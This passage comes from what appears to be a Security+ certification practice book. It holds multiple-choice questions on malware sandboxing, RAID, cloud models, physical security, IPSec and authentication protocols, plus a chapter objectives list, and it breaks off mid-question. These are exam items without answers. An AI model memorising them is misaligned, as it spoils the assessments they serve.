37. You are the security officer for a large company. You have discovered malware on one of the workstations. You are concerned that the malware might have multiple functions and might have caused more security issues with the computer than you can currently detect. What is the best way to test this malware?
A. Leave the malware on that workstation until it is tested.
B. Place the malware in a sandbox environment for testing.
C. It is not important to test it; just remove it from the machine.
D. Place the malware on a honeypot for testing.
38. Web developers in your company currently have direct access to the production server and can deploy code directly to it. This can lead to unsecure code, or simply code flaws being
2898deployed to the live system. What would be the best change you could make to mitigate
2899this risk?
2900A. Implement sandboxing.
2901B. Implement virtualized servers.
2902C. Implement a staging server.
2903D. Implement deployment policies.
290439. Denish is concerned about the security of embedded devices in his company. He is most
2905concerned about the operating system security for such devices. Which of the following
2906would be the best option for mitigating this threat?
2907A. RTOS
2908B. SCADA
2909C. FDE
2910D. TPM
291140. Which of the following 802.11 standards is supported in WPA2, but not in WEP or WPA?
2912A. 802.11a
2913B. 802.11b
2914C. 802.11i
2915D. 802.11n
291641. Teresa is responsible for WiFi security in her company. Which wireless security protocol
2917uses TKIP?
2918A. WPA
2919B. CCMP
2920C. WEP
2921D. WPA2
292242. Juan is responsible for wireless security in his company. He has decided to disable the SSID
2923broadcast on the single AP the company uses. What will the effect be on client machines?
2924A. They will no longer be able to use wireless networking.
2925B. They will no longer see the SSID as a preferred network when they are connected.
2926C. They will no longer see the SSID as an available network.
2927D. They will be required to make the SSID part of their HomeGroup.
292843. Which cloud service model provides the consumer with the infrastructure to create appli-
2929cations and host them?
2930A. SaaS
2931B. PaaS
2932C. IaaS
2933D. CaaS
293444. Which cloud service model gives the consumer the ability to use applications provided by
2935the cloud provider over the Internet?
2936A. SaaS
2937B. PaaS
2938C. IaaS
2939D. CaaS
294045. Which feature of cloud computing involves dynamically provisioning (or deprovisioning)
2941resources as needed?
2942A. Multitenancy
2943B. Elasticity
2944C. CMDB
2945D. Sandboxing
294646. Which type of hypervisor implementation is known as “bare metal�
2947A. Type I
2948B. Type II
2949C. Type III
2950D. Type IV
295147. Mohaned is a security analyst and has just removed malware from a virtual server. What
2952feature of virtualization would he use to return the virtual server to a last known good
2953state?
2954A. Sandboxing
2955B. Hypervisor
2956C. Snapshot
2957D. Elasticity
295848. Lisa is concerned about fault tolerance for her database server. She wants to ensure that if
2959any single drive fails, it can be recovered. What RAID level would support this goal while
2960using distributed parity bits?
2961A. RAID 0
2962B. RAID 1
2963C. RAID 3
2964D. RAID 5
296549. Jarod is concerned about EMI affecting a key escrow server. Which method would be
2966most effective in mitigating this risk?
2967A. VLAN
2968B. SDN
2969C. Trusted platform module
2970D. Faraday cage
297150. John is responsible for physical security at his company. He is particularly concerned
2972about an attacker driving a vehicle into the building. Which of the following would
2973provide the best protection against this threat?
2974A. A gate
2975B. Bollards
2976C. A security guard on duty
2977D. Security cameras
297851. Mark is responsible for cybersecurity at a small college. There are many computer labs
2979that are open for students to use. These labs are monitored only by a student worker, who
2980may or may not be very attentive. Mark is concerned about the theft of computers. Which
2981of the following would be the best way for him to mitigate this threat?
2982A. Cable locks
2983B. FDE on the lab computers
2984C. Strong passwords on the lab computers
2985D. Having a lab sign-in sheet
298652. Joanne is responsible for security at a power plant. The facility is very sensitive and secu-
2987rity is extremely important. She wants to incorporate two-factor authentication with
2988physical security. What would be the best way to accomplish this?
2989A. Smart cards
2990B. A mantrap with a smart card at one door and a pin keypad at the other door
2991C. A mantrap with video surveillance
2992D. A fence with a smart card gate access
299353. Which of the following terms refers to the process of establishing a standard for security?
2994A. Baselining
2995B. Security evaluation
2996C. Hardening
2997D. Normalization
299854. You are trying to increase security at your company. You’re currently creating an outline
2999of all the aspects of security that will need to be examined and acted on. Which of the fol-
3000lowing terms describes the process of improving security in a trusted OS?
3001A. FDE
3002B. Hardening
3003C. SED
3004D. Baselining
300555. Which level of RAID is a “stripe of mirrors�
3006A. RAID 1+0
3007B. RAID 6
3008C. RAID 0
3009D. RAID 1
301056. Isabella is responsible for database management and security. She is attempting to remove
3011redundancy in the database. What is this process called?
3012A. Integrity checking
3013B. Deprovisioning
3014C. Baselining
3015D. Normalization
301657. A list of applications approved for use on your network would be known as which of the
3017following?
3018A. Blacklist
3019B. Red list
3020C. Whitelist
3021D. Orange list
302258. Hans is a security administrator for a large company. Users on his network visit a wide
3023range of websites. He is concerned they might get malware from one of these many web-
3024sites. Which of the following would be his best approach to mitigate this threat?
3025A. Implement host-based antivirus.
3026B. Blacklist known infected sites.
3027C. Set browsers to allow only signed components.
3028D. Set browsers to block all active content (ActiveX, JavaScript, etc.).
302959. Elizabeth has implemented agile development for her company. What is the primary dif-
3030ference between agile development and the waterfall method?
3031A. Agile has fewer phases.
3032B. Waterfall has fewer phases.
3033C. Agile is more secure.
3034D. Agile repeats phases.
303560. John is using the waterfall method for application development. At which phase should he
3036implement security measures?
3037A. Requirements
3038B. Design
3039C. Implementation
3040D. All
304161. You are responsible for database security at your company. You are concerned that pro-
3042grammers might pass badly written SQL commands to the database, or that an attacker
3043might exploit badly written SQL in applications. What is the best way to mitigate this
3044threat?
3045A. Programmer training
3046B. Programming policies
3047C. Agile programming
3048D. Stored procedures
3049
305062. Mary is concerned about application security for her company’s application development.
3051Which of the following is the most important step for addressing application security?
3052A. Proper error handling
3053B. Regular data backups
3054C. Encrypted data transmission
3055D. Strong authentication
305663. Farès is responsible for managing the many virtual machines on his company’s networks.
3057Over the past two years, the company has increased the number of virtual machines sig-
3058nificantly. Farès is no longer able to effectively manage the large number of machines.
3059What is the term for this situation?
3060A. VM overload
3061B. VM sprawl
3062C. VM spread
3063D. VM zombies
306464. Mary is responsible for virtualization management in her company. She is concerned
3065about VM escape. Which of the following methods would be the most effective in mitigat-
3066ing this risk?
3067A. Only share resources between the VM and host if absolutely necessary.
3068B. Keep the VM patched.
3069C. Use a firewall on the VM.
3070D. Use host-based antimalware on the VM.
307165. You work at a large company. You are concerned about ensuring that all workstations
3072have a common configuration, no rogue software is installed, and all patches are kept up
3073to date. Which of the following would be the most effective for accomplishing this?
3074A. Use VDE.
3075B. Implement strong policies.
3076C. Use an image for all workstations.
3077D. Implement strong patch management.
307866. Juan is responsible for the physical security of the company server room. He has been
3079asked to recommend a type of fire suppression system for the server room. Which of the
3080following would be the best choice?
3081A. Wet pipe
3082B. Deluge
3083C. Pre-action
3084D. Halon
308567. You are responsible for server room security for your company. You are concerned about
3086physical theft of the computers. Which of the following would be best able to detect theft
3087or attempted theft?
3088A. Motion sensor–activated cameras
3089B. Smart card access to the server rooms
3090C. Strong deadbolt locks for the server rooms
3091D. Logging everyone who enters the server room
309268. Teresa has deployed session tokens on her network. These would be most effective against
3093which of the following attacks?
3094A. DDoS
3095B. Replay
3096C. SYN flood
3097D. Malware
309869. Hector is using infrared cameras to verify that servers in his datacenter are being properly
3099racked. Which of the following datacenter elements is he concerned about?
3100A. EMI blocking
3101B. Humidity control
3102C. Hot and cold aisles
3103D. HVAC
310470. Gerald is concerned about unauthorized people entering the company’s building. Which
3105of the following would be most effective in preventing this?
3106A. Alarm systems
3107B. Fencing
3108C. Cameras
3109D. Security guards
311071. Which of the following is the most important benefit from implementing SDN?
3111A. It will stop malware.
3112B. It provides scalability.
3113C. It will detect intrusions.
3114D. It will prevent session hijacking.
311572. Mark is an administrator for a health care company. He has to support an older, legacy
3116application. He is concerned that this legacy application might have vulnerabilities that
3117would affect the rest of the network. What is the most efficient way to mitigate this?
3118A. Use an application container.
3119B. Implement SDN.
3120C. Run the application on a separate VLAN.
3121D. Insist on an updated version of the application.
312273. Lars is auditing the physical security of a company. The company uses chain-link fences
3123on its perimeter. The fence is over pavement, not soft ground. How close to the ground
3124should the bottom of the fence be?
3125A. Touching the ground
3126B. Within 4 inches
3127C. There is no standard for this.
3128D. Within 2 inches
312974. Mia has to deploy and support a legacy application. The configuration for this application
3130and the OS it runs on are very specific and cannot be changed. What is the best approach
3131for her to deploy this?
3132A. Use an immutable server.
3133B. Use a VM.
3134C. Set permissions on the application so it cannot be changed.
3135D. Place the application on a separate VLAN.
313675. To mitigate the impact of a software vendor going out of business, a company that uses
3137vendor software should require which one of the following?
3138A. A detailed credit investigation prior to acquisition
3139B. A third-party source-code escrow
3140C. Substantial penalties for breach of contract
3141D. Standby contracts with other vendors
314276. Abigail is responsible for datacenters in a large, multinational company. She has to sup-
3143port multiple datacenters in diverse geographic regions. What would be the most effective
3144way for her to manage these centers consistently across the enterprise?
3145A. Hire datacenter managers for each center.
3146B. Implement enterprise-wide SDN.
3147C. Implement Infrastructure as Code (IaC).
3148D. Automate provisioning and deprovisioning.
314977. Olivia is responsible for web application security for her company’s e-commerce server.
3150She is particularly concerned about XSS and SQL injection. Which technique would be
3151most effective in mitigating these attacks?
3152A. Proper error handling
3153B. The use of stored procedures
3154C. Proper input validation
3155D. Code signing
315678. Sophia wants to test her company’s web application to see if it is handling input validation
3157and data validation properly. Which testing method would be most effective for this?
3158A. Static code analysis
3159B. Fuzzing
3160C. Baselining
3161D. Version control
316279. Omar is using the waterfall method for software development in his company. Which of
3163the following is the proper sequence for the waterfall method?
3164A. Requirements, design, implementation, testing, deployment, maintenance
3165B. Planning, designing, coding, testing, deployment
3166C. Requirements, planning, designing, coding, testing, deployment
3167D. Design, coding, testing, deployment, maintenance
316880. Lilly is responsible for security on web applications for her company. She is checking to
3169see that all applications have robust input validation. What is the best way to implement
3170validation?
3171A. Server-side validation
3172B. Client-side validation
3173C. Validate in transit
3174D. Client-side and server-side validation
317581. Edward is responsible for web application security at a large insurance company. One
3176of the applications that he is particularly concerned about is used by insurance adjusters
3177in the field. He wants to have strong authentication methods to mitigate misuse of the
3178application. What would be his best choice?
3179A. Authenticate the client with a digital certificate.
3180B. Implement a very strong password policy.
3181C. Secure application communication with TLS.
3182D. Implement a web application firewall (WAF).
318382. Sarah is the CIO for a small company. The company uses several custom applications
3184that have complicated interactions with the host operating system. She is concerned about
3185ensuring that systems on her network are all properly patched. What is the best approach
3186in her environment?
3187A. Implement automatic patching.
3188B. Implement a policy that has individual users patch their systems.
3189C. Delegate patch management to managers of departments so they can find the best
3190patch management for their departments.
3191D. Immediately deploy patches to a test environment, then as soon as testing is complete
3192have a staged rollout to the network.
319383. John is examining the logs for his company’s web applications. He discovers what he
3194believes is a breach. After further investigation, it appears as if the attacker executed code
3195from one of the libraries the application uses, code that is no longer even used by the
3196application. What best describes this attack?
3197A. Buffer overflow
3198B. Code reuse attack
3199C. DoS attack
3200D. Session hijacking
320184. Emiliano is a network administrator and is concerned about the security of peripheral
3202devices. Which of the following would be a basic step he could take to improve security
3203for those devices?
3204A. Implement FDE.
3205B. Turn off remote access (SSH, telnet, etc.) if not needed.
3206C. Utilize fuzzy testing for all peripherals.
3207D. Implement digital certificates for all peripherals.
320885. Ixxia is a software development team manager. She is concerned about memory leaks in
3209code. What type of testing is most likely to find memory leaks?
3210A. Fuzzing
3211B. Stress testing
3212C. Static code analysis
3213D. Normalization
321486. Victor is a network administrator for a medium-sized company. He wants to be able to
3215access servers remotely so that he can perform small administrative tasks from remote
3216locations. Which of the following would be the best protocol for him to use?
3217A. SSH
3218B. Telnet
3219C. RSH
3220D. SNMP
322187. Mark is responsible for a server that runs sensitive software for a major research facility.
3222He is very concerned that only authorized software execute on this server. He is also
3223concerned about malware masquerading as legitimate, authorized software. What
3224technique would best address this concern?
3225A. Secure boot
3226B. Software attestation
3227C. Sandboxing
3228D. TPM
322988. Hannah is a programmer with a large software company. She is interested in ensuring that
3230the module she just created will work well with a module created by another program.
3231What type of testing is this?
3232A. Unit testing
3233B. Regression testing
3234C. Stress testing
3235D. Integration testing
323689. Erik is responsible for the security of a SCADA system. Availability is a critical issue.
3237Which of the following is most important to implement?
3238A. SIEM
3239B. IPS
3240C. Automated patch control
3241D. Honeypot
324290. You are concerned about the security of new devices your company has implemented.
3243Some of these devices use SoC technology. What would be the best security measure you
3244could take for these?
3245A. Using a TPM
3246B. Ensuring each has its own cryptographic key
3247C. Using SED
3248D. Using BIOS protection
324991. Vincent works for a company that manufactures portable medical devices, such as insulin
3250pumps. He is concerned about ensuring these devices are secure. Which of the following is
3251the most important step for him to take?
3252A. Ensure all communications with the device are encrypted.
3253B. Ensure the devices have FDE.
3254C. Ensure the devices have individual antimalware.
3255D. Ensure the devices have been fuzz tested.
325692. Emile is concerned about securing the computer systems in vehicles. Which of the follow-
3257ing vehicle types has significant cybersecurity vulnerabilities?
3258A. UAV
3259B. Automobiles
3260C. Airplanes
3261D. All of the above
326293. Ariel is responsible for software development in her company. She is concerned that the
3263software development team integrate well with the network system. She wants to ensure
3264that software development processes are aligned with the security needs of the entire
3265network. Which of the following would be most important for her to implement?
3266A. Integration testing
3267B. Secure DevOps
3268C. Clear policies
3269D. Employee training
3270
327194. Greg is a programmer with a small company. He is responsible for the web application.
3272He has become aware that one of the modules his web application uses may have a secu-
3273rity flaw allowing an attacker to circumvent authentication. There is an update available
3274for this module that fixes the flaw. What is the best approach for him to take to mitigate
3275this threat?
3276A. Submit an RFC.
3277B. Immediately apply the update.
3278C. Place the update on a test server, then if it works apply it to the production server.
3279D. Document the issue.
328095. You are using a sophisticated system that models various attacks on your networks. You
3281intend for this system to help your team realize weak areas and improve response to
3282incidents. What is the most important step to take before relying on data from this system?
3283A. Get approval from a CAB.
3284B. Thoroughly review the systems documentation.
3285C. Verify the models being used.
3286D. Perform integration testing on the system.
328796. Your company has an accounting application that was developed in-house. It has been in
3288place for 36 months, and functioning very well, with very few issues. You have just made
3289a minor change to the tax calculation based on a change in tax law. What should be your
3290next step?
3291A. Deploy the change.
3292B. Get CAB approval for the change.
3293C. Perform stress testing.
3294D. Perform regression testing.
329597. Tom works as a software development manager for a large company. He is trying to
3296explain to management the difference between compiled code and runtime code. What is
3297the biggest advantage of compiled code?
3298A. Better performance
3299B. Platform independence
3300C. More secure
3301D. Faster development time
330298. Your company is interested in keeping data in the cloud. Management feels that public
3303clouds are not secure but is concerned about the cost of a private cloud. What is the
3304solution you would recommend?
3305A. Tell them there are no risks with public clouds.
3306B. Tell them they will have to find a way to budget for a private cloud.
3307C. Suggest that they consider a community cloud.
3308D. Recommend against a cloud solution at this time.
330999. Your development team primarily uses Windows, but they need to develop a specific solu-
3310tion that will run on Linux. What is the best solution to getting your programmers access
3311to Linux systems for development and testing?
3312A. Set their machines to dual-boot Windows and Linux.
3313B. PaaS
3314C. Set up a few Linux machines for them to work with as needed.
3315D. IaaS
3316100. Daniel works for a mid-sized financial institution. The company has recently moved some
3317of its data to a cloud solution. Daniel is concerned that the cloud provider may not sup-
3318port the same security policies as the company’s internal network. What is the best way to
3319mitigate this concern?
3320A. Implement a cloud access security broker.
3321B. Perform integration testing.
3322C. Establish cloud security policies.
3323D. Implement Security as a Service.
3324101. Hanz is responsible for the e-commerce servers at his company. He is concerned about
3325how they will respond to a DoS attack. Which software testing methodology would be
3326most helpful in determining this?
3327A. Regression testing
3328B. Stress testing
3329C. Integration testing
3330D. Fuzz testing
3331102. You are the CIO for a small company. The company wants to use cloud storage for some
3332of its data, but cost is a major concern. Which of the following cloud deployment models
3333would be best?
3334A. Community cloud
3335B. Private cloud
3336C. Public cloud
3337D. Hybrid cloud
3338103. Alisha is monitoring security for a mid-sized financial institution. Under her predecessor
3339there were multiple high-profile breaches. Management is very concerned about detecting
3340any security issues or breach of policy as soon as possible. Which of the following would
3341be the best solution for this?
3342A. Monthly audits
3343B. NIPS
3344C. NIDS
3345D. Continuous monitoring
3346
3347104. Helga works for a bank and is responsible for secure communications with the online
3348banking application. The application uses TLS to secure all customer communications.
3349She has noticed that since migrating to larger encryption keys, the server’s performance
3350has declined. What would be the best way to address this issue?
3351A. Implement a VPN concentrator.
3352B. Implement an SSL accelerator.
3353C. Return to smaller encryption keys.
3354D. Upgrade all servers.
3355105. What is the primary advantage of allowing only signed code to be installed on computers?
3356A. It guarantees that malware will not be installed.
3357B. It improves patch management.
3358C. It verifies who created the software.
3359D. It executes faster on computers with a TPM.
3360106. Which of the following is the best description for VM sprawl?
3361A. When VMs on your network outnumber physical machines
3362B. When there are more VMs than IT can effectively manage
3363C. When a VM on a computer begins to consume too many resources
3364D. When VMs are spread across a wide area network
3365107. Which of the following is the best description of a stored procedure?
3366A. Code that is in a DLL, rather than the executable
3367B. Server-side code that is called from a client
3368C. SQL statements compiled on the database server as a single procedure that can be
3369called
3370D. Procedures that are kept on a separate server from the calling application, such as in
3371middleware
3372108. Farès is responsible for security at his company. He has had bollards installed around the
3373front of the building. What is Farès trying to accomplish?
3374A. Gated access for people entering the building
3375B. Video monitoring around the building
3376C. Protecting against EMI
3377D. Preventing a vehicle from being driven into the building
3378109. Jane is concerned about servers in her datacenter. She is particularly worried about EMI.
3379What damage might EMI most likely cause to servers?
3380A. Damage to chips (CPU or RAM)
3381B. Temperature control issues
3382C. Malware infections
3383D. The staff could be locked out of the servers.
3384110. You are concerned about VM escape attacks. Which of the following would provide the
3385most protection against this?
3386A. Completely isolate the VM from the host.
3387B. Install a host-based antivirus on both the VM and the host.
3388C. Implement FDE on both the VM and the host.
3389D. Use a TPM on the host.
3390111. Teresa is the network administrator for a small company. The company is interested in a
3391robust and modern network defense strategy but lacks the staff to support it. What would
3392be the best solution for Teresa to use?
3393A. Implement SDN.
3394B. Use automated security.
3395C. Use Security as a Service.
3396D. Implement only as much security controls as they can support.
3397112. Dennis is trying to set up a system to analyze the integrity of applications on his network.
3398He wants to make sure that the applications have not been tampered with or Trojaned.
3399What would be most useful in accomplishing this goal?
3400A. Implement NIPS.
3401B. Use cryptographic hashes.
3402C. Sandbox the applications in question.
3403D. Implement NIDS.
3404113. George is a network administrator at a power plant. He notices that several turbines had
3405unusual ramp-ups in cycles last week. After investigating, he finds that an executable was
3406uploaded to the system control console and caused this. Which of the following would be
3407most effective in preventing this from affecting the SCADA system in the future?
3408A. Implement SDN.
3409B. Improve patch management.
3410C. Place the SCADA system on a separate VLAN.
3411D. Implement encrypted data transmissions.
3412114. Tom is responsible for VPN connections in his company. His company uses IPSec for
3413VPNs. What is the primary purpose of AH in IPSec?
3414A. Encrypt the entire packet.
3415B. Encrypt just the header.
3416C. Authenticate the entire packet.
3417D. Authenticate just the header.
3418115. Mia is a network administrator for a bank. She is responsible for secure communications
3419with her company’s customer website. Which of the following would be the best for her to
3420implement?
3421A. SSL
3422B. PPTP
3423C. IPSec
3424D. TLS
3425
3426116. Abigail is responsible for setting up an NIPS on her network. The NIPS is located in one
3427particular network segment. She is looking for a passive method to get a copy of all traf-
3428fic to the NIPS network segment so that it can analyze the traffic. Which of the following
3429would be her best choice?
3430A. Using a network tap
3431B. Using port mirroring
3432C. Setting the NIPS on a VLAN that is connected to all other segments
3433D. Setting up an NIPS on each segment
3434117. Janice is explaining how IPSec works to a new network administrator. She is trying to
3435explain the role of IKE. Which of the following most closely matches the role of IKE in
3436IPSec?
3437A. It encrypts the packet.
3438B. It establishes the SAs.
3439C. It authenticates the packet.
3440D. It establishes the tunnel.
3441118. Jeff is the security administrator for an e-commerce site. He is concerned about DoS
3442attacks. Which of the following would be the most effective in addressing this?
3443A. DDoS mitigator
3444B. WAF with SPI
3445C. NIPS
3446D. Increased available bandwidth
3447119. Doug is a network administrator for a small company. The company has recently imple-
3448mented an e-commerce server. This has placed a strain on network bandwidth. What
3449would be the most cost-effective means for him to address this issue?
3450A. Isolate the new server on a separate network segment.
3451B. Upgrade the network to CAT 7.
3452C. Move to fiber optic.
3453D. Implement aggregation switches.
3454120. Liam is responsible for monitoring security events in his company. He wants to see how
diverse events may connect. He is interested in identifying different indicators of compromise that may point to the same breach. Which of the following would be most helpful for him to implement?
A. NIDS
B. SIEM
C. Correlation engine
D. Aggregation switch
121. Emily manages the IDS/IPS for her network. She has an NIPS installed and properly configured. It is not detecting obvious attacks on one specific network segment. She has verified that the NIPS is properly configured and working properly. What would be the most efficient way for her to address this?
A. Implement port mirroring for that segment.
B. Install an NIPS on that segment.
C. Upgrade to a more effective NIPS.
D. Isolate that segment on its own VLAN.
122. You have been instructed to find a VPN solution for your company. Your company uses TACACS+ for remote access. Which of the following would be the best VPN solution for your company?
A. PPTP
B. RADIUS
C. L2TP
D. CHAP
123. Jacob is the CIO for a mid-sized company. His company has very good security policies and procedures. The company has outsourced its web application development to a well-known web programming company. Which of the following should be the most important security issue for Jacob to address?
A. The web application vendor’s hiring practices
B. The financial stability of the web application vendor
C. Security practices of the web application vendor
D. Having an escrow for the source code
124. Gerard is responsible for physical security at his company. He is considering using cameras that would detect a burglar entering the building at night. Which of the following would be most useful in accomplishing this goal?
A. Motion-sensing camera
B. Infrared-sensing camera
C. Sound-activated camera
D. HD camera
125. Tim is implementing a Faraday cage around his server room. What is the primary purpose of a Faraday cage?
A. Regulate temperature
B. Regulate current
C. Block intrusions
D. Block EMI
126. You are working for a large company. You are trying to find a solution that will provide controlled physical access to the building and record every employee who enters the building. Which of the following would be the best for you to implement?
A. A security guard with a sign-in sheet
B. Smart card access
C. A camera by the entrance
D. A sign-in sheet by the front door
127. David is responsible for cryptographic keys in his company. What is the best way to deauthorize a public key?
A. Send out a network alert.
B. Delete the digital certificate.
C. Publish that certificate in the CRL.
D. Notify the RA.
128. Thomas is trying to select the right fire extinguisher for his company’s server room. Which of the following would be his best choice?
A. Type A
B. Type B
C. Type C
D. Type D
129. Carole is concerned about security for her server room. She wants the most secure lock she can find for the server room door. Which of the following would be the best choice for her?
A. Combination lock
B. Key-in-knob
C. Deadbolt
D. Padlock
130. What is the ideal humidity range for a server room?
A. 70% to 80%
B. 40% to 60%
C. Below 30%
D. Above 70%
131. Molly is implementing biometrics in her company. Which of the following should be her biggest concern?
A. FAR
B. FRR
C. CER
D. EER
132. Daniel is responsible for physical security in his company. All external doors have electronic smart card access. In an emergency such as a power failure, how should the doors fail?
A. Fail secure
B. Fail closed
C. Fail open
D. Fail locked
133. Donald is responsible for networking for a defense contractor. He is concerned that emanations from UTP cable could reveal classified information. Which of the following would be his most effective way to address this?
A. Migrate to CAT 7 cable.
B. Implement protected cabling.
C. Place all cable in a Faraday cage.
D. Don’t send any classified information over the cable.
134. Fred is responsible for physical security in his company. He wants to find a good way to protect the USB thumb drives that have BitLocker keys stored on them. Which of the following would be the best solution for this situation?
A. Store the drives in a secure cabinet.
B. Encrypt the thumb drives.
C. Don’t store BitLocker keys on these drives.
D. Lock the thumb drives in desk drawers.
135. Juanita is responsible for servers in her company. She is looking for a fault-tolerant solution that can handle two drives failing. Which of the following should she select?
A. RAID 1+0
B. RAID 3
C. RAID 5
D. RAID 6
136. You are a network administrator for a mid-sized company. You need all workstations to have the same configuration. What would be the best way for you to accomplish this?
A. Push out a configuration file.
B. Implement a policy requiring all workstations to be configured the same way.
C. Ensure all computers have the same version of the operating system and the same applications installed.
D. Use a master image that is properly configured and image all workstations from that.
137. Mike is a network administrator for an e-commerce company. There have been several updates to the operating system, the web server software, and the web application, all within the last 24 hours. It appears that one of these updates has caused a significant security problem. What would be the best approach for Mike to take to correct this problem?
A. Remove the updates one at a time to see which corrects the problem.
B. Roll the server back to the last known good state.
C. Investigate and find out which update caused the problem, and remove only that update.
D. Investigate and find out which update caused the problem, and find a patch for that issue.
138. Which device would most likely process the following rules?
PERMIT IP ANY EQ 443
DENY IP ANY ANY
A. NIPS
B. HIPS
C. Content filter
D. Firewall
139. Ixxia is responsible for security at a mid-sized company. She wants to prevent users on her network from visiting job-hunting sites while at work. Which of the following would be the best device to accomplish this goal?
A. Proxy server
B. NAT
C. Firewall
D. NIPS
140. You are responsible for an e-commerce site. The site is hosted in a cluster. Which of the following techniques would be best in assuring availability?
A. A VPN concentrator
B. Aggregate switching
C. An SSL accelerator
D. Load balancing
141. When you are concerned about application security, what is the most important issue in memory management?
A. Never allocate a variable any larger than is needed.
B. Always check bounds on arrays.
C. Always declare a variable where you need it (i.e., at function or file level if possible).
D. Make sure you release any memory you allocate.
142. Darrel is looking for a cloud solution for his company. One of the requirements is that the IT staff can make the transition with as little change to the existing infrastructure as possible. Which of the following would be his best choice?
A. Off-premises cloud
B. On-premises cloud
C. Hybrid solution
D. Use only a community cloud
143. Ryan is concerned about the security of his company’s web application. Since the application processes confidential data, he is most concerned about data exposure. Which of the following would be the most important for him to implement?
A. WAF
B. TLS
C. NIPS
D. NIDS
144. Arjun has just taken over web application security for a small company. He notices that some values are temporarily stored in hidden fields on one of the web pages. What is this called and how would it be best characterized?
A. This is obfuscation, a weak security measure.
B. This is data hiding, a weak security measure.
C. This is obfuscation, a possible security flaw.
D. This is data hiding, a possible security flaw.
145. What is the primary reason a company would consider implementing Agile programming?
A. To speed up development time
B. To improve development documentation
C. To focus more on design
D. To focus more on testing
146. When you’re implementing security cameras in your company, which of the following is the most important concern?
A. High-definition video
B. Large storage capacity
C. How large an area the camera can cover
D. Security of the camera and video storage
147. What is the primary security issue presented by monitors?
A. Unauthorized users may see confidential data.
B. Data can be detected from electromagnetic emanations.
C. Poor authentication
D. Screen burn
148. Clark is responsible for mobile device security in his company. Which of the following is the most important security measure for him to implement?
A. Encrypted drives
B. Patch management
C. Remote wiping
D. Geotagging
149. Which of the following security measures is most effective against phishing attacks?
A. User training
B. NIPS
C. Spam filters
D. Content filter
150. You are the CISO for a mid-sized health care company. Which of the following is the most important for you to implement?
A. Industry best practices
B. Contractual requirements
C. Strong security policies
D. Regulatory requirements

Chapter 4
Identity and Access Management

The CompTIA Security+ Exam SY0-501 topics covered in this chapter include the following:
✓ 4.1 Compare and contrast identity and access management concepts.
  ■ Identification, authentication, authorization and accounting (AAA)
  ■ Multifactor authentication
    ■ Something you are
    ■ Something you have
    ■ Something you know
    ■ Somewhere you are
    ■ Something you do
  ■ Federation
  ■ Single sign-on
  ■ Transitive trust
✓ 4.2 Given a scenario, install and configure identity and access services.
  ■ LDAP
  ■ Kerberos
  ■ TACACS+
  ■ CHAP
  ■ PAP
  ■ MSCHAP
  ■ RADIUS
  ■ SAML
  ■ OpenID Connect
  ■ OAUTH
  ■ Shibboleth
  ■ Secure token
  ■ NTLM
✓ 4.3 Given a scenario, implement identity and access management controls.
  ■ Access control models
    ■ MAC
    ■ DAC
    ■ ABAC
    ■ Role-based access control
    ■ Rule-based access control
  ■ Physical access control
    ■ Proximity cards
    ■ Smart cards
  ■ Biometric factors
    ■ Fingerprint scanner
    ■ Retinal scanner
    ■ Iris scanner
    ■ Voice recognition
    ■ Facial recognition
    ■ False acceptance rate
    ■ False rejection rate
    ■ Crossover error rate
  ■ Tokens
    ■ Hardware
    ■ Software
    ■ HOTP/TOTP
  ■ Certificate-based authentication
    ■ PIV/CAC/smart card
    ■ IEEE 802.1x
  ■ File system security
  ■ Database security
✓ 4.4 Given a scenario, differentiate common account management practices.
  ■ Account types
    ■ User account
    ■ Shared and generic accounts/credentials
    ■ Guest accounts
    ■ Service accounts
    ■ Privileged accounts
  ■ General Concepts
    ■ Least privilege
    ■ Onboarding/offboarding
    ■ Permission auditing and review
    ■ Usage auditing and review
    ■ Time-of-day restrictions
    ■ Recertification
    ■ Standard naming convention
    ■ Account maintenance
    ■ Group-based access control
    ■ Location-based policies
  ■ Account policy enforcement
    ■ Credential management
    ■ Group policy
    ■ Password complexity
    ■ Expiration
    ■ Recovery
    ■ Disablement
    ■ Lockout
    ■ Password history
    ■ Password reuse
    ■ Password length

Chapter 4 ■ Identity and Access Management
1. Jack is using smart cards for authentication. He is trying to classify the type of authentication for a report to his CIO. What type of authentication is Jack using?
A. Type I
B. Type II
C. Type III
D. Strong
2. Carole is responsible for various network protocols at her company. The network time protocol has been intermittently failing. Which of the following would be most affected?
A. Kerberos
B. RADIUS
C. CHAP
D. LDAP
3. You are selecting an authentication method for your company’s servers. You are looking for a method that periodically reauthenticates clients to prevent session hijacking. Which of the following would be your best choice?
A. PAP
B. SPAP
C. CHAP
D. OAUTH
4. Emiliano is working for a small company. His company is concerned about authentication and wants to implement biometrics using facial recognition and fingerprint scanning. How would this authentication be classified?
A. Type I
B. Type II
C. Type III
D. Strong
5. Lisa is setting up accounts for her company. She wants to set up accounts for the Oracle database server. Which of the following would be the best type of account to assign to the database service?
A. User
B. Guest
C. Admin
D. Service
6. You have been asked to select an authentication method that will support single sign-on, integrate with SAML, and work well over the Internet. Which of the following would be your best choice?
A. Shibboleth
B. OAUTH
C. SPAP
D. CHAP
7. Which authentication method was used as a native default for older versions of Microsoft Windows?
A. PAP
B. CHAP
C. OAUTH
D. NTLM
8. Carl has been asked to set up access control for a server. The requirements state that users at a lower privilege level should not be able to see or access files or data at a higher privilege level. What access control model would best fit these requirements?
A. MAC
B. DAC
C. RBAC
D. SAML
9. Clarice is concerned about an attacker getting information regarding network resources in her company. Which protocol should she implement that would be most helpful in mitigating this risk?
A. LDAP
B. TLS
C. SNMP
D. LDAPS
10. Ahmed is looking for an authentication protocol for his network. He is very concerned about highly skilled attackers. As part of mitigating that concern, he wants an authentication protocol that never actually transmits a user’s password, in any form. Which authentication protocol would be a good fit for Ahmed’s needs?
A. CHAP
B. Kerberos
C. RBAC
D. Type II
11. You work for a social media website. You wish to integrate your users’ accounts with other web resources. To do so, you need to allow authentication to be used across different domains, without exposing your users’ passwords to these other services. Which of the following would be most helpful in accomplishing this goal?
A. Kerberos
B. SAML
C. OAUTH
D. OpenID
12. Mary is trying to set up remote access to her network for salespeople in her company. Which protocol would be most helpful in accomplishing this goal?
A. RADIUS
B. Kerberos
C. CHAP
D. OpenID
13. Victor is trying to identify the protocol used by Windows for authentication to a server that is not part of the network domain. Which of the following would be most useful for Victor?
A. Kerberos
B. NTLM
C. OpenID
D. CHAP
14. You have been asked to find an authentication service that is handled by a third party. The service should allow users to access multiple websites, as long as they support the third-party authentication service. What would be your best choice?
A. OpenID
B. Kerberos
C. NTLM
D. Shibboleth
15. Abigail is implementing biometrics for her company. She is trying to get the false rejection rate and false acceptance rate to the same level. What is the term used for this?
